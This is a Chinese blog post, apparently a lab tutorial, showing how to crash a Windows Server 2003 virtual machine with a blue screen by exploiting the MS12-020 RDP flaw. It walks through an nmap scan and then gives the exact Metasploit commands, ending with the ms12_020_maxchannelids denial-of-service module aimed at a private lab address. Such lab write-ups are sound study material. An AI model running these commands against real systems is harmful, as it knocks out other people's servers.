win 2003蓝屏攻击

win 2003蓝屏攻击,第1张

  • 基本原理:利用 *** 作系统内核的缺陷,发送大量数据包,则这个漏洞可能造成拒绝服务攻击或允许远程执行代码。
    • ms12-020漏洞的定义是指 *** 作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。根据微软的安全公告,Windows全系列 *** 作系统(WinXP/Vista/Win7/Win2000/ Win2003/Win2008)均存在受控威胁。
  • 在攻击之前首先需要几个必须条件:
    • 1、本次攻击实验在虚拟机中进行,需要安装kail linux攻击机和win server 2003目标靶机,利用kail linux自带的msfconsole进行攻击;
      • 红色方框标注的工具

    • 2、目标机相应的攻击端口3389需要打开;
    • 3、确保目标机与攻击机可以相互ping通。
  • 攻击流程:
  • 1、确保win 2003能够上网,并且开启相应的远程连接(最好关掉掉防火墙),然后查看win2003主机上的IP地址;
    • 主机能够上网

    • 查看win 2003的IP地址

  • 2、确保能够在kail linux中能够ping通win 2003主机;
    • 网络连接良好

  • 3、信息收集,使用nmap进行扫描,查看开放的端口;
    • 所需的3389端口已经处于打开状态

  • 4、漏洞挖掘,首先进入msfconsole运行msf,查找有关MS12020的aux;
    • 这里有两个aux,第一个是攻击的aux,第二个是检测是否具有MS12020漏洞的aux,我们先使用第一个aux对目标机进行检测

  • 5、配置参数,配置完以后show options 这里已经配置完毕了;
  • 6、接下来exploit开始检测,这里检测出可以使用MS12020进行攻击;
  • 7、漏洞利用,接下来我们就可以使用第一个aux模块进行攻击了,设置好攻击IP地址后检查参数配置,然后进行攻击;
  • 8、攻击成功。
    • win 2003主机出现蓝屏错误代码,表示攻击成功。

  • ******

         攻击命令顺序依次如下:

(1)nmap 靶机ip地址   (确保3389端口打开)

(2)msfconsole命令启动Metasploit

(3)msf6 > search ms12-020

(4)msf6 > use auxiliary/scanner/rdp/ms12_020_check

(5)msf6 > set rhosts

(6)msf6 > show options

(7)msf6 > exploit

(8)msf6 > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids  //选择攻击

(9)msf6 > set rhost 192.168.197.132  //设置靶机的机IP地址

(10)msf6 > exploit  //进行攻击

欢迎分享,转载请注明来源:内存溢出

原文地址:https://54852.com/langs/790741.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2022-05-05
下一篇2022-05-05

发表评论

登录后才能评论

评论列表(0条)

    保存